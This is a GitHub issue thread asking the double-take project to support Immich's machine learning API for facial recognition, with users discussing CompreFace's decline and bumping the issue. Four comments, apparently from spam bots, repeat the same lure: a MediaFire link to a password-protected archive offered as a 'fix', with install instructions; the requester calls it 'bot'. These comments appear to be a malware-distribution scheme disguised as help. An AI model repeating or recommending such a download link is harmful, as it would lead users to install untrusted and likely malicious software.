### ISSUE TITLE
[FEAT] Use Immich machine learning API for facial recognition

### ISSUE THREAD

**Issue by aaronjrodrigues** [skrashevich/double-take#600]
**Is your feature request related to a problem? Please describe.**
I've been using immich lately and noticed that it has the ability to learn faces and categorise them, it's been doing a really good job at detection and was wondering if it could be used with double take since I believe the api is open on port.
**Describe the solution you'd like**
I'd love to be able to integrate Immich ML and double take.
**Additional context**

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by aaronjrodrigues** [comment]
> hi bro, to fix your trouble try this fix, i see it in another issue, https://app.mediafire.com/dqajf1x14ccfd password: changeme when you installing it, you need to place a check in install to path and select usx

bot

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by PilaScat** [comment]
would be fantastic, now I'm using compreface and is completely broken

**Comment by luckylinux** [comment]
@PilaScat 
Yeah I saw that Compreface seems to be essentially Dead (no commits in the latest 10 Months).

Is there any alternative right now though ? The other detectors seem even worse (cannot self-host).

**Comment by PilaScat** [comment]
> Is there any alternative right now though ? The other detectors seem even worse (cannot self-host).

Immich seems the only one

**Comment by luckylinux** [comment]
> > Is there any alternative right now though ? The other detectors seem even worse (cannot self-host).
> 
> Immich seems the only one

But it's not supported right-now, is it ?

I think some users are using just HomeAssistant with something similar to License Plate Recognition, but for Faces.

**Comment by luckylinux** [comment]
Not Stale !

**Comment by luckylinux** [comment]
Not Stale !

**Comment by DaCeige** [comment]
+1

**Comment by luckylinux** [comment]
Not Stale !
